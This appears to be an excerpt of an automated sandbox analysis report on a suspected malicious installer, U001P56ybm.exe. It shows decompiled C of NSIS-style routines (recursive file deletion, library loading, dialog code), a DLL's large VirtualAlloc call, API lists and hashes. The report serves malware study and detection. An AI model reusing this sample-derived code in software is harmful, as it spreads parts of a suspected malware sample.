								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E004055E3(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404CC9(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42ebe8 =  *0x42ebe8 + 1;
										} else {
											E00404CC9(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E00405679();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405250(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42afe0 - 0x5c;
					if( *0x42afe0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405C22(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E0040541E(_t72);
							E004055E3(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404CC9(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404CC9(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E00405679();
						}
						L33:
						 *0x42ebe8 =  *0x42ebe8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                    0x0040525b
                    0x0040525f
                    0x00405268
                    0x0040526b
                    0x0040526e
                    0x00405276
                    0x00405278
                    0x00405279
                    0x00000000
                    0x00405279
                    0x00405288
                    0x00405288
                    0x0040528b
                    0x0040528e
                    0x004052a2
                    0x004052a9
                    0x004052ae
                    0x004052b0
                    0x004052c0
                    0x004052b2
                    0x004052b8
                    0x004052b8
                    0x004052c5
                    0x004052c8
                    0x004052d3
                    0x004052d9
                    0x004052de
                    0x004052ee
                    0x004052f0
                    0x004052f6
                    0x004052f9
                    0x004052fc
                    0x004053b9
                    0x004053b9
                    0x004053bd
                    0x004053bf
                    0x004053bf
                    0x004053bf
                    0x004053bf
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405302
                    0x00405302
                    0x0040530b
                    0x00405311
                    0x00405316
                    0x00405319
                    0x0040531b
                    0x0040531f
                    0x00405321
                    0x00405321
                    0x0040531f
                    0x00405324
                    0x00405327
                    0x0040533a
                    0x0040533c
                    0x00405341
                    0x00405348
                    0x00405360
                    0x00405366
                    0x0040536c
                    0x0040536e
                    0x00405393
                    0x00405370
                    0x00405370
                    0x00405374
                    0x00405388
                    0x00405376
                    0x00405379
                    0x0040537e
                    0x00405380
                    0x00405381
                    0x00405381
                    0x00405374
                    0x0040534a
                    0x00405350
                    0x00405352
                    0x00405358
                    0x00405358
                    0x00405352
                    0x00000000
                    0x00405348
                    0x00405329
                    0x0040532c
                    0x0040532e
                    0x00000000
                    0x00000000
                    0x00405330
                    0x00405332
                    0x00000000
                    0x00000000
                    0x00405334
                    0x00405338
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405398
                    0x004053a2
                    0x004053a8
                    0x004053a8
                    0x004053b3
                    0x00000000
                    0x004053b3
                    0x004052ca
                    0x004052d1
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405290
                    0x00405290
                    0x00405292
                    0x004053c3
                    0x004053c6
                    0x004053c9
                    0x0040541b
                    0x0040541b
                    0x0040541b
                    0x004053cb
                    0x004053ce
                    0x004053d9
                    0x004053de
                    0x004053e0
                    0x00000000
                    0x00000000
                    0x004053e3
                    0x004053e9
                    0x004053ef
                    0x004053f5
                    0x004053f7
                    0x00000000
                    0x00405413
                    0x004053f9
                    0x004053fd
                    0x00000000
                    0x00000000
                    0x00405402
                    0x00405407
                    0x00405408
                    0x00000000
                    0x00405409
                    0x004053d0
                    0x004053d0
                    0x00000000
                    0x004053d0
                    0x00405298
                    0x0040529c
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040529c

                    APIs
                    • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 0040526E
                    • lstrcatA.KERNEL32(0042AFE0,\*.*,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004052B8
                    • lstrcatA.KERNEL32(?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004052D9
                    • lstrlenA.KERNEL32(?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004052DF
                    • FindFirstFileA.KERNEL32(0042AFE0,?,?,?,0040900C,?,0042AFE0,?,00000000,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 004052F0
                    • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004053A2
                    • FindClose.KERNEL32(?), ref: 004053B3
                    Strings
                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405250
                    • \*.*, xrefs: 004052B2
                    • "C:\Users\user\Desktop\U001P56ybm.exe" , xrefs: 0040525A
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: "C:\Users\user\Desktop\U001P56ybm.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                    • API String ID: 2035342205-1318752889
                    • Opcode ID: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                    • Instruction ID: 18b38f57d6fcfee0f7be8354c3f8d746a349f6914723925c053c0c26f7a8b105
                    • Opcode Fuzzy Hash: a22421f420a0055125289edea63265979e601a45820f011afd9a607384fe30c9
                    • Instruction Fuzzy Hash: DF512270804B54A6DB226B228C45BBF3A68CF82759F14817FFC45751C2C7BC4982CE6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405C49, Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405C49(signed int _a4) {
				struct HINSTANCE__* _t5;
				CHAR* _t7;
				signed int _t9;

				_t9 = _a4 << 3;
				_t7 =  *(_t9 + 0x4091f8);
				_t5 = GetModuleHandleA(_t7);
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t9 + 0x4091fc));
				}
				_t5 = LoadLibraryA(_t7); // executed
				if(_t5 != 0) {
					goto L2;
				}
				return _t5;
			}






                    0x00405c51
                    0x00405c54
                    0x00405c5b
                    0x00405c63
                    0x00405c70
                    0x00000000
                    0x00405c77
                    0x00405c66
                    0x00405c6e
                    0x00000000
                    0x00000000
                    0x00405c7f

                    APIs
                    • GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                    • LoadLibraryA.KERNELBASE(?,?,00000000,00403126,00000008), ref: 00405C66
                    • GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AddressHandleLibraryLoadModuleProc
                    • String ID:
                    • API String ID: 310444273-0
                    • Opcode ID: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                    • Instruction ID: 3d59114c1a23b0d625c809938346f6a0554fd3dae4d1067b70da7b5bee76f7f8
                    • Opcode Fuzzy Hash: fc658b4faf86fd9df0ae4f37537bc1bd8d984ae3d6aa4247b09a4764ab3a2bdc
                    • Instruction Fuzzy Hash: B4E08632A0861557E6114F309E4CD6773A8DE866403010439F505F6140D734AC11AFBA
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00405C22, Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E00405C22(CHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileA(_a4, 0x42c028); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x42c028;
			}




                    0x00405c2d
                    0x00405c36
                    0x00000000
                    0x00405c43
                    0x00405c39
                    0x00000000

                    APIs
                    • FindFirstFileA.KERNELBASE(?,0042C028,0042B3E0,00405542,0042B3E0,0042B3E0,00000000,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\U001P56ybm.exe" ,00000000), ref: 00405C2D
                    • FindClose.KERNEL32(00000000), ref: 00405C39
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Find$CloseFileFirst
                    • String ID:
                    • API String ID: 2295610775-0
                    • Opcode ID: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                    • Instruction ID: 1d1880cbde17bc14012e82a4269dfe036a3ba599bb462203ffcaea8973668f8b
                    • Opcode Fuzzy Hash: 93a427bfd80f56c82a5a4d8bd6fda67f37b59ad8eed9f57ff1b743868f20ffd4
                    • Instruction Fuzzy Hash: A5D0123694DA209BD3541778BD0CC8B7A58DF593317104B32F026F22E4D7388C518EAE
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 100034C0, Relevance: 2877.8, APIs: 1, Strings: 1914, Instructions: 5297memoryCOMMON
                    Download Yara Rule
                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,11E1A300,00003000,00000004), ref: 1000BF6E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: AllocVirtual
                    • String ID: $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $ $!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$!$"$"$"$"$"$"$"$"$"$"$"$"$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$#$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$%$%$%$%$%$%$%$%$%$%$%$%$%$%$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$&$'$'$'$'$'$'$'$'$'$'$'$'$($($($($($($($($($($($($($($($($)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$)$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$*$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$+$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$,$-$-$-$-$-$-$-$-$-$-$-$-$-$-$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$.$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$/$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$0$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$1$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$2$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$3$4$4$4$4$4$4$4$4$4$4$4$4$4$4$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$5$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$6$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$7$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$8$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$9$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$:$;$;$;$;$;$;$;$;$;$;$;$;$;$;$;$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$<$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$=$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$>$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$?$@$@$@$@$@$@$@$@$@$@$@$@$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$A$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$C$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$D$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$E$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$F$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$G$H$H$H$H$H$H$H$H$H$H$H$H$H$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$I$J$J$J$J$J$J$J$J$J$J$J$J$J$J$J$K$K$K$K$K$K$K$K$K$K$K$K$K$K$K$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$L$M$M$M$M$M$M$M$M$M$M$M$M$M$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$N$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$O$P$P$P$P$P$P$P$P$P$P$P$P$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$Q$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$R$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$S$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$T$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$U$V$V$V$V$V$V$V$V$V$V$V$V$V$V$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$W$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$X$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Y$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$Z$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$[$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$\$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$]$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$^$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$_$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$`$a$a$a$a$a$a$a$a$a$a$a$a$a$a$a$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$b$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$c$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$f$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$g$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$h$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$i$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$j$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$k$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$p$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$q$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$u$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$v$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$w$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$x$y$y$y$y$y$y$y$y$y$y$y$z$z$z$z$z$z$z$z$z$z$z$z${${${${${${${${${${${${${${${${${$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$|$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$}$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~$~
                    • API String ID: 4275171209-4079164987
                    • Opcode ID: f2471703540d62f08c48e5e15e174bbe62e8b76e8fc67e5c299cf2417261d894
                    • Instruction ID: 0652af2c6b852cd72de7e3cc5b47842b286dd2b2d36711a57adbe5cdaea91348
                    • Opcode Fuzzy Hash: f2471703540d62f08c48e5e15e174bbe62e8b76e8fc67e5c299cf2417261d894
                    • Instruction Fuzzy Hash: A4144A1090DBEAC8EB32823C5C587CDAE611B23225F4843D9D1EC3A6D6C7B50B95DF66
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0040380A, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 84%
                    			E0040380A(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				intOrPtr _t44;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;
				void* _t142;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x429fbc = _t35;
					if(_t115 == 0x110) {
						 *0x42eb68 = _t125;
						 *0x429fd0 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x428f98 = _t91;
						E00403CDD(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x42e348); // executed
						 *0x42e32c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x429fbc = 1;
					}
					_t122 =  *0x40919c; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x42eb80;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403D29(0x40b);
						while(1) {
							_t37 =  *0x429fbc;
							 *0x40919c =  *0x40919c + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x40919c; // 0xffffffff
							__eflags = _t39 -  *0x42eb84; // 0x2
							if(__eflags == 0) {
								E0040140B(1);
							}
							__eflags =  *0x42e32c - _t133; // 0x0
							if(__eflags != 0) {
								break;
							}
							_t44 =  *0x42eb84; // 0x2
							__eflags =  *0x40919c - _t44; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E0040594D(_t116, _t125, _t130, 0x436800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403CDD(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403CDD(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x42ebec - _t133; // 0x0
							_v32 = _t49;
							if(__eflags != 0) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403CFF(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x428f98, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x42ebec - _t133; // 0x0
							if(__eflags == 0) {
								_push( *0x429fd0);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x428f98);
							}
							E00403D12();
							E0040592B(0x429fd8, "foxdilaoqebdbpxrsdbw Setup");
							E0040594D(0x429fd8, _t125, _t130,  &(0x429fd8[lstrlenA(0x429fd8)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x429fd8);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x42e338);
									 *0x4297a8 = _t130;
									__eflags =  *_t130 - _t133;
									if( *_t130 <= _t133) {
										goto L58;
									}
									_t73 = CreateDialogParamA( *0x42eb60,  *_t130 +  *0x42e340 & 0x0000ffff, _t125,  *(0x4091a0 +  *(_t130 + 4) * 4), _t130);
									__eflags = _t73 - _t133;
									 *0x42e338 = _t73;
									if(_t73 == _t133) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t130 + 0x2c)));
									_push(6);
									E00403CDD(_t73);
									GetWindowRect(GetDlgItem(_t125, 0x3fa), _t134 + 0x10);
									ScreenToClient(_t125, _t134 + 0x10);
									SetWindowPos( *0x42e338, _t133,  *(_t134 + 0x20),  *(_t134 + 0x20), _t133, _t133, 0x15);
									_push(_t133);
									E00401389( *((intOrPtr*)(_t130 + 0xc)));
									__eflags =  *0x42e32c - _t133; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x42e338, 8);
									E00403D29(0x405);
									goto L58;
								}
								__eflags =  *0x42ebec - _t133; // 0x0
								if(__eflags != 0) {
									goto L61;
								}
								__eflags =  *0x42ebe0 - _t133; // 0x0
								if(__eflags != 0) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x42e338);
						 *0x42eb68 = _t133;
						EndDialog(_t125,  *0x4293a0);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t130 - _t133;
							if( *_t130 == _t133) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
						__eflags = _t86;
						if(_t86 == 0) {
							goto L33;
						}
						SendMessageA( *0x42e338, 0x40f, 0, 1);
						__eflags =  *0x42e32c - _t133; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t125 = _a4;
					_t133 = 0;
					if(_t115 == 0x47) {
						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
					}
					if(_t115 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
					}
					if(_t115 != 0x40d) {
						__eflags = _t115 - 0x11;
						if(_t115 != 0x11) {
							__eflags = _t115 - 0x111;
							if(_t115 != 0x111) {
								L26:
								return E00403D44(_t115, _a12, _a16);
							}
							_t132 = _a12 & 0x0000ffff;
							_t126 = GetDlgItem(_t125, _t132);
							__eflags = _t126 - _t133;
							if(_t126 == _t133) {
								L13:
								__eflags = _t132 - 1;
								if(_t132 != 1) {
									__eflags = _t132 - 3;
									if(_t132 != 3) {
										_t127 = 2;
										__eflags = _t132 - _t127;
										if(_t132 != _t127) {
											L25:
											SendMessageA( *0x42e338, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42ebec - _t133; // 0x0
										if(__eflags == 0) {
											_t99 = E0040140B(3);
											__eflags = _t99;
											if(_t99 != 0) {
												goto L26;
											}
											 *0x4293a0 = 1;
											L21:
											_push(0x78);
											L22:
											E00403CB6();
											goto L26;
										}
										E0040140B(_t127);
										 *0x4293a0 = _t127;
										goto L21;
									}
									__eflags =  *0x40919c - _t133; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t132);
								goto L22;
							}
							SendMessageA(_t126, 0xf3, _t133, _t133);
							_t103 = IsWindowEnabled(_t126);
							__eflags = _t103;
							if(_t103 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t125, _t133, _t133);
						return 1;
					} else {
						DestroyWindow( *0x42e338);
						 *0x42e338 = _a12;
						L58:
						if( *0x42afd8 == _t133) {
							_t142 =  *0x42e338 - _t133; // 0x0
							if(_t142 != 0) {
								ShowWindow(_t125, 0xa);
								 *0x42afd8 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}
































                    0x00403813
                    0x0040381c
                    0x0040395d
                    0x00403961
                    0x00403965
                    0x00403967
                    0x0040396c
                    0x00403977
                    0x00403982
                    0x00403987
                    0x00403989
                    0x0040398b
                    0x0040398e
                    0x00403993
                    0x004039a1
                    0x004039ae
                    0x004039b5
                    0x004039b5
                    0x004039b6
                    0x004039b6
                    0x004039bb
                    0x004039c1
                    0x004039c8
                    0x004039ce
                    0x004039d0
                    0x00403a10
                    0x00403a15
                    0x00403a1a
                    0x00403a1a
                    0x00403a1f
                    0x00403a28
                    0x00403a2a
                    0x00403a2f
                    0x00403a35
                    0x00403a39
                    0x00403a39
                    0x00403a3e
                    0x00403a44
                    0x00000000
                    0x00000000
                    0x00403a4a
                    0x00403a4f
                    0x00403a55
                    0x00000000
                    0x00000000
                    0x00403a5e
                    0x00403a66
                    0x00403a6b
                    0x00403a6e
                    0x00403a74
                    0x00403a79
                    0x00403a7c
                    0x00403a82
                    0x00403a87
                    0x00403a8a
                    0x00403a90
                    0x00403a98
                    0x00403a9e
                    0x00403aa4
                    0x00403aa8
                    0x00403aaf
                    0x00403aaf
                    0x00403aaf
                    0x00403ab9
                    0x00403acb
                    0x00403ad7
                    0x00403adc
                    0x00403ae6
